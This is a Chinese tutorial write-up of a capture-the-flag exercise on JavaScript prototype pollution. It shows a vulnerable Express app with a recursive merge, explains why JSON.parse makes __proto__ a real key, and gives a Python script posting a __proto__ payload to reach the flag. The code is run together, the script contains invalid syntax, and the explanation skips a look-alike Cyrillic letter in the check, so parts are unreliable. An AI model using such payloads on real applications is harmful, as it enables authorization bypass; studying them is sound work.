本文主要是介绍JavaScript另外一道原型链污染例题,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
目录
代码
代码分析
编辑使用脚本进行原型链污染
结果
代码
'use strict';const express = require('express');
const bodyParser = require('body-parser')
const cookieParser = require('cookie-parser');
const path = require('path');const isObject = obj => obj && obj.constructor && obj.constructor === Object;function merge(a, b) {for (var attr in b) {if (isObject(a[attr]) && isObject(b[attr])) {merge(a[attr], b[attr]);} else {a[attr] = b[attr];}}return a
}function clone(a) {return merge({}, a);
}// Constants
const PORT = 8080;
const HOST = '0.0.0.0';
const admin = {};// App
const app = express();
app.use(bodyParser.json())
app.use(cookieParser());app.use('/', express.static(path.join(__dirname, 'views')));
app.post('/signup', (req, res) => {var body = JSON.parse(JSON.stringify(req.body)); // {"__proto__": {"admin":1}}//传递的值
var copybody = clone(body)
//你传递什么值就是啥值if (copybody.name) {res.cookie('name', copybody.name).json({"done": "cookie set"});} else {res.json({"error": "cookie not set"})}
});
app.get('/getFlag', (req, res) => {
//获取cookie,如果admin.admin=1就获取cookie,JSON.stringify将JavaScript转换为JSON的字符串,然后再用JSON.parse进行解析var аdmin = JSON.parse(JSON.stringify(req.cookies))if (admin.аdmin == 1) {res.send("hackim19{}");} else {res.send("You are not authorized");}
});
app.listen(PORT, HOST);
console.log(`Running on http://${HOST}:${PORT}`);代码分析
当出现了这两个函数就有可能是JavaScript原型链污染
function merge(a, b) {for (var attr in b) {if (isObject(a[attr]) && isObject(b[attr])) {merge(a[attr], b[attr]);} else {a[attr] = b[attr];}}return a
}function clone(a) {return merge({}, a);
}merge就是如果有两个相同的key值后者会将前置进行一个覆盖
然后我们尝试传入一个数值(传入如下面代码),触发clone然后触发merge,尝试进行一个原型链污染,但是测试结果是无法进行污染,admin这个对象还是未定义,原因是在我们在创建字典的时候已经作为__proto__给test赋值了,所以test.__proto__中是有admin属性了。__proto__并不被认为是一个键名
var test = {"test1":"aaa","__proto__":{"admin":1}}
//我们想要达到的效果,相当于给test1的原型对像构造了一个函数admin=1那么我们如何达到我们的目的,那就想办法让__proto__被认为是一个键名,我们可以使用下面代码,我们在下面子代码中使用JSON.parse解析代码,这样在下面代码中__proto__就会被认为是一个键名
var test = JSON.parse('{"test1":"aaa","__proto__":{"admin":1}}')
现在我们开启环境
使用脚本进行原型链污染
import requests
import json
url1 = "http://127.0.0.1:8080/getflag"
url2 = "http://127.0.0.1:8080/signup"
s = requests.session()
headers = {"Content-Type":"application/json"}
//data1的原型对象是Object
data1 = {"__proto__":{"admin":1}}res1 = s.post(url2,headers=headers,data = json.dumps(data1))
res2 = s.get(url1)
print(res2.text)使用上述代码,代码走到下图这里的时候a是{},a的__proto__是Object.prototype,然后b是你输入的值{"admin":1},b的__proto__就等于//当代码走到这里时a是{}他的__proto__是Object.prototype,然后b是你输入的值,b的__proto__就等于{"admin":1},再往下走进行递归,b[attr]是1,b[attr]就不是一个对象了就走到else里面了,然后a[attr]=Object.prototype[admin],b[attr]就是b[admin]等于1。最后写入的形态就是这样:Object.prototype.admin=1
结果
这篇关于JavaScript另外一道原型链污染例题的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
